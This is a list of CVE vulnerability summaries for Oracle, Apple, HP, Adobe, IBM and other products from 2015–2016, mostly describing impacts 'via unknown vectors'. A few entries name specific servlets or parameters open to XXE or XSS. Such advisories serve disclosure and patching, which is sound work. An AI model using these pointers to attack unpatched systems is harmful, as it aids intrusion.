Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.5.0, 8.5.1, and 8.5.2 allows local users to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2015-4808, CVE-2015-6013, CVE-2015-6015, and CVE-2016-0432.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this issue is a stack-based buffer overflow in Oracle Outside In 8.5.2 and earlier, which allows remote attackers to execute arbitrary code via a crafted DOC file.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.5.0, 8.5.1, and 8.5.2 allows local users to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2015-4808, CVE-2015-6014, CVE-2015-6015, and CVE-2016-0432.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this issue is a stack-based buffer overflow in Oracle Outside In 8.5.2 and earlier, which allows remote attackers to execute arbitrary code via a crafted WK4 file.
Unspecified vulnerability in International Components for Unicode (ICU) before 53.1.0, as used in Apple OS X before 10.11 and watchOS before 2, has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in Twisted in Wiki Server in Apple OS X Server before 5.0.3 allow attackers to have an unknown impact via an XML document.
Multiple unspecified vulnerabilities in SQLite before 3.8.10.2, as used in Apple iOS before 9, have unknown impact and attack vectors.
IOStorageFamily in Apple iOS before 9 does not properly initialize an unspecified data structure, which allows local users to obtain sensitive information from kernel memory via unknown vectors.
XNU in the kernel in Apple iOS before 9 does not properly initialize an unspecified data structure, which allows local users to obtain sensitive memory-layout information via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the web server on Siemens SIMATIC S7-1200 CPU devices with firmware before 4.1.3 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Adobe Flash Player before 18.0.0.241 and 19.x before 19.0.0.185 on Windows and OS X and before 11.2.202.521 on Linux, Adobe AIR before 19.0.0.190, Adobe AIR SDK before 19.0.0.190, and Adobe AIR SDK &amp; Compiler before 19.0.0.190 allow attackers to cause a denial of service (vector-length corruption) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway before 10.1 Build 132.8, 10.5 before Build 57.7, and 10.5e before Build 56.1505.e allow remote attackers to gain privileges via unknown vectors, related to the (1) Command Line Interface (CLI) and the (2) Web User Interface (UI).
The HTTP Strict Transport Security (HSTS) module 6.x-1.x before 6.x-1.1 and 7.x-1.x before 7.x-1.2 for Drupal does not properly implement the "include subdomains" directive, which causes the HSTS policy to not be applied to subdomains and allows man-in-the-middle attackers to have unspecified impact via unknown vectors.
The Storage API module 7.x-1.x before 7.x-1.8 for Drupal does not properly restrict access to Storage API fields attached to entities that are not nodes, which allows remote attackers to have unspecified impact via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Operations Orchestration Central 10.x before 10.22.001 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP StoreOnce Backup system software before 3.13.1 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in HP Software Update before 5.005.002.002 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in HP Integrated Lights-Out (iLO) firmware 3 before 1.85 and 4 before 2.22 allows remote authenticated users to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP LoadRunner Controller before 12.50 allows local users to gain privileges via unknown vectors, aka ZDI-CAN-2756.
Unspecified vulnerability in HP KeyView before 10.23.0.1 and 10.24.x before 10.24.0.1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2885.
Unspecified vulnerability in HP KeyView before 10.23.0.1 and 10.24.x before 10.24.0.1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2884.
Unspecified vulnerability in HP KeyView before 10.23.0.1 and 10.24.x before 10.24.0.1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2883.
Unspecified vulnerability in HP KeyView before 10.23.0.1 and 10.24.x before 10.24.0.1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2881.
Unspecified vulnerability in HP KeyView before 10.23.0.1 and 10.24.x before 10.24.0.1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2880.
Unspecified vulnerability in HP KeyView before 10.23.0.1 and 10.24.x before 10.24.0.1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2879.
Unspecified vulnerability in HP KeyView before 10.23.0.1 and 10.24.x before 10.24.0.1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2877.
Unspecified vulnerability in HP KeyView before 10.23.0.1 and 10.24.x before 10.24.0.1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2876.
Unspecified vulnerability in HP KeyView before 10.23.0.1 and 10.24.x before 10.24.0.1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2875.
Cross-site request forgery (CSRF) vulnerability in HP Version Control Repository Manager (VCRM) before 7.5.0 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in Joomla! 3.2.0 through 3.3.x and 3.4.x before 3.4.2 allows remote attackers to hijack the authentication of unspecified victims for requests that upload code via unknown vectors.
Cross-site scripting (XSS) vulnerability in unspecified dialogs for printing content in the Front End in Open-Xchange Server 6 and OX App Suite before 6.22.8-rev8, 6.22.9 before 6.22.9-rev15m, 7.x before 7.6.1-rev25, and 7.6.2 before 7.6.2-rev20 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to object properties.
Unspecified vulnerability in the HTTP/2 experimental feature in Apache Traffic Server before 5.3.x before 5.3.2 has unknown impact and attack vectors, a different vulnerability than CVE-2015-5168.
Unspecified vulnerability in the HTTP/2 experimental feature in Apache Traffic Server 5.3.x before 5.3.2 has unknown impact and attack vectors, a different vulnerability than CVE-2015-5206.
Adobe Flash Player before 18.0.0.232 on Windows and OS X and before 11.2.202.508 on Linux, Adobe AIR before 18.0.0.199, Adobe AIR SDK before 18.0.0.199, and Adobe AIR SDK &amp; Compiler before 18.0.0.199 allow attackers to cause a denial of service (vector-length corruption) or possibly have unspecified other impact via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in django CMS before 3.0.14, 3.1.x before 3.1.1 allows remote attackers to manipulate privileged users into performing unknown actions via unspecified vectors.
The host memory mapping path feature in the NVIDIA GPU graphics driver R346 before 346.87 and R352 before 352.41 for Linux and R352 before 352.46 for GRID vGPU and vSGA does not properly restrict access to third-party device IO memory, which allows attackers to gain privileges, cause a denial of service (resource consumption), or possibly have unspecified other impact via unknown vectors related to the follow_pfn kernel-mode API call.
Unspecified vulnerability in IBM WebSphere Commerce 7.0.0.6 through 7.0.0.9 allows remote authenticated users to obtain sensitive personal information via unknown vectors.
Jazz Team Server in Jazz Foundation in IBM Rational Collaborative Lifecycle Management (CLM) 3.x and 4.x before 4.0.7 IF9, 5.x before 5.0.2 IF9, and 6.x before 6.0.1; Rational Quality Manager (RQM) 3.x before 3.0.1.6 IF7, 4.x before 4.0.7 IF9, 5.x before 5.0.2 IF9, and 6.x before 6.0.1; Rational Team Concert (RTC) 3.x before 3.0.1.6 IF7, 4.x before 4.0.7 IF9, 5.x before 5.0.2 IF9, and 6.x before 6.0.1; Rational Requirements Composer (RRC) 3.x before 3.0.1.6 IF7 and 4.x before 4.0.7 IF9; Rational DOORS Next Generation (RDNG) 4.x before 4.0.7 IF9, 5.x before 5.0.2 IF9, and 6.x before 6.0.1; Rational Engineering Lifecycle Manager (RELM) 4.x through 4.0.7, 5.x through 5.0.2, and 6.x before 6.0.1; Rational Rhapsody Design Manager (DM) 4.x through 4.0.7, 5.x through 5.0.2, and 6.x before 6.0.1; and Rational Software Architect Design Manager (DM) 4.x through 4.0.7, 5.x through 5.0.2, and 6.x before 6.0.1 uses weak permissions for unspecified project areas, which allows remote authenticated users to obtain sensitive information via unknown vectors.
The Web UI in IBM Security QRadar SIEM 7.1.x before 7.1 MR2 Patch 12 allows remote authenticated users to execute unspecified OS commands via unknown vectors.
Unspecified vulnerability in IBM WebSphere eXtreme Scale 8.6 through 8.6.0.8 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the Workspace Manager component in Oracle Database Server 11.2.0.4 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the XML Developer's Kit for C component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in the Database Vault component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 allows remote authenticated users to affect integrity via unknown vectors related to Security, a different vulnerability than CVE-2015-4892.
Unspecified vulnerability in Oracle Java SE 8u60 and JavaFX 2.2.85 allows remote attackers to affect confidentiality via unknown vectors, a different vulnerability than CVE-2015-4906 and CVE-2015-4908.
Unspecified vulnerability in the Integrated Lights Out Manager (ILOM) component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to System Management.
Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 10.1.3.5, 11.1.1.7, 11.1.1.9, 12.1.2.0, and 12.1.3.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Web Listener.
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Memcached.
Unspecified vulnerability in Oracle Java SE 8u60 and JavaFX 2.2.85 allows remote attackers to affect confidentiality via unknown vectors, a different vulnerability than CVE-2015-4906 and CVE-2015-4916.
Unspecified vulnerability in Oracle Sun Solaris 11.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Solaris Kernel Zones, a different vulnerability than CVE-2015-4820.
Unspecified vulnerability in Oracle Java SE 8u60 and JavaFX 2.2.85 allows remote attackers to affect confidentiality via unknown vectors related to JavaFX, a different vulnerability than CVE-2015-4908 and CVE-2015-4916.
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to libmysqld.
Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60 allows remote attackers to affect integrity via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Java SE 8u60 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to JavaFX.
Unspecified vulnerability in the XDB - XML Database component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 3.0.1 and 3.1.2 allows remote attackers to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 4.0.34, 4.1.42, 4.2.34, 4.3.32, and 5.0.8, when a VM has the Remote Display feature (RDP) enabled, allows remote attackers to affect availability via unknown vectors related to Core.
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.
Unspecified vulnerability in the Mobile Server component in Oracle Database Mobile/Lite Server 10.3.0.3, 11.3.0.2, and 12.1.0.0 allows remote authenticated users to affect integrity and availability via unknown vectors.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 allows remote authenticated users to affect integrity via unknown vectors related to Security, a different vulnerability than CVE-2015-4917.
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Replication.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-4796.
Unspecified vulnerability in the PeopleSoft Enterprise HCM component in Oracle PeopleSoft Products 9.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to ePerformance.
Unspecified vulnerability in the Oracle Report Manager component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Reports Security.  NOTE: the previous information is from the October 2015 CPU. Oracle has not commented on third-party claims that this issue is an XML External Entity (XXE) vulnerability, which allows remote attackers to read arbitrary files, cause a denial of service, or conduct SMB Relay attacks via a crafted DTD in an XML request involving the OA_HTML/copxml servlet.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality via unknown vectors related to Single Signon.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 allows remote attackers to affect integrity via unknown vectors related to Content Server, a different vulnerability than CVE-2015-4867.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.5.0, 8.5.1, and 8.5.2 allows local users to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2015-4877.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.5.0, 8.5.1, and 8.5.2 allows local users to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2015-4878.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.53 and 8.54 allows remote authenticated users to affect integrity via unknown vectors related to Pivot Grid.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 12.1.0.4 and 12.1.0.5 allows remote attackers to affect availability via unknown vectors related to Agent Next Gen.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 12.1.0.4 and 12.1.0.5 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Agent Next Gen.
Unspecified vulnerability in the Database Scheduler component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60; Java SE Embedded 8u51; and JRockit R28.3.7 allows remote attackers to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in Oracle Java SE 7u85 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11.2 allows local users to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in Oracle Java SE 8u60 and Java SE Embedded 8u51 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 allows remote attackers to affect integrity via unknown vectors related to Content Server, a different vulnerability than CVE-2015-4880.
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.
Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.24 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges.
Unspecified vulnerability in the Portable Clusterware component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 12.1.0.4 and 12.1.0.5 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Agent Next Gen.
Unspecified vulnerability in the RDBMS component in Oracle Database Server 12.1.0.1 and 12.1.0.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 4.0.30, 4.1.38, 4.2.30, 4.3.26, and 5.0.0 allows local users to affect availability via unknown vectors related to Core.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.0.6, 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect integrity via unknown vectors related to Single Signon.  NOTE: the previous information is from the October 2015 CPU. Oracle has not commented on third-party claims that this issue is a cross-site scripting (XSS) vulnerability, which allows remote attackers to inject arbitrary web script or HTML via the Domain parameter in the CfgOCIReturn servlet.
Unspecified vulnerability in the PeopleSoft Enterprise HCM component in Oracle PeopleSoft Products 9.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Talent Acquisition Management.
Unspecified vulnerability in the Oracle Payments component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Punch-in. NOTE: the previous information is from the October 2015 CPU. Oracle has not commented on third-party claims that this issue is an XML External Entity (XXE) vulnerability, which allows remote attackers to cause a denial of service or conduct SMB Relay attacks via a crafted DTD in an XML request to OA_HTML/IspPunchInServlet.
Unspecified vulnerability in the Oracle Configurator component in Oracle Supply Chain Products Suite 12.0.6, 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality via unknown vectors related to Integration with Peoplesoft.
Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the Siebel Core - Server Framework component in Oracle Siebel CRM IP2014 and IP2015 allows remote attackers to affect confidentiality via unknown vectors related to Services.
Unspecified vulnerability in Oracle Java SE 7u85 and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality via unknown vectors related to 2D.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to DB Listener, a different vulnerability than CVE-2015-4798.
Unspecified vulnerability in Oracle Sun Solaris 11.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Utility/Security.
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : SP.
Unspecified vulnerability in Oracle Sun Solaris 11.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Utility/Zones.
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition.
Unspecified vulnerability in Oracle Sun Solaris 11.2 allows local users to affect availability via unknown vectors related to Solaris Kernel Zones, a different vulnerability than CVE-2015-4822.
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges.
Unspecified vulnerability in the Oracle Retail Open Commerce Platform component in Oracle Retail Applications 3.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Framework.
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Types.
Unspecified vulnerability in the PeopleSoft Enterprise FIN Expenses component in Oracle PeopleSoft Products 9.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Expense Report General.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Hyperion Installation Technology component in Oracle Hyperion 11.1.2.3 allows local users to affect confidentiality via unknown vectors related to Essbase Rapid Deploy.
Unspecified vulnerability in Oracle Sun Solaris 11.2 allows local users to affect availability via unknown vectors related to Solaris Kernel Zones, a different vulnerability than CVE-2015-4831.
Unspecified vulnerability in the Integrated Lights Out Manager (ILOM) component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web.
Unspecified vulnerability in Oracle Sun Solaris 11.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Solaris Kernel Zones, a different vulnerability than CVE-2015-4907.
Unspecified vulnerability in Oracle MySQL Server 5.5.44 and earlier, and 5.6.25 and earlier, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client programs.
Unspecified vulnerability in Oracle MySQL Server 5.5.44 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 4.0.34, 4.1.42, 4.2.34, 4.3.32, and 5.0.8, when using a Windows guest, allows local users to affect availability via unknown vectors related to Core.
Unspecified vulnerability in Oracle Java SE 7u85 and 8u60 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier, when running on Windows, allows remote authenticated users to affect availability via unknown vectors related to Server : Query Cache.
Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Serialization.
Unspecified vulnerability in the PeopleSoft Enterprise HCM Talent Acquisition Management component in Oracle PeopleSoft Products 9.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4792.
Unspecified vulnerability in Oracle Sun Solaris 11.2 allows local users to affect confidentiality via unknown vectors related to Solaris Kernel Zones.
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer.
Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 7.6.2, 11.1.1.6.1, and 11.1.1.8.0 allows remote attackers to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to DB Listener, a different vulnerability than CVE-2015-4839.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.3 allows remote authenticated users to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2, when running on Windows, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-4888.
Unspecified vulnerability in the Oracle Utilities Work and Asset Management component in Oracle Industry Applications 1.9.1.1.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Add-On Applications.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Communications Convergence component in Oracle Communications Applications 2.0 and 3.0.1 allows remote attackers to affect confidentiality via unknown vectors related to Mail Proxy.
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4802.
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Privileges.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, and CVE-2015-4789.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect integrity and availability via unknown vectors, a different vulnerability than CVE-2015-4774 and CVE-2015-4779.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
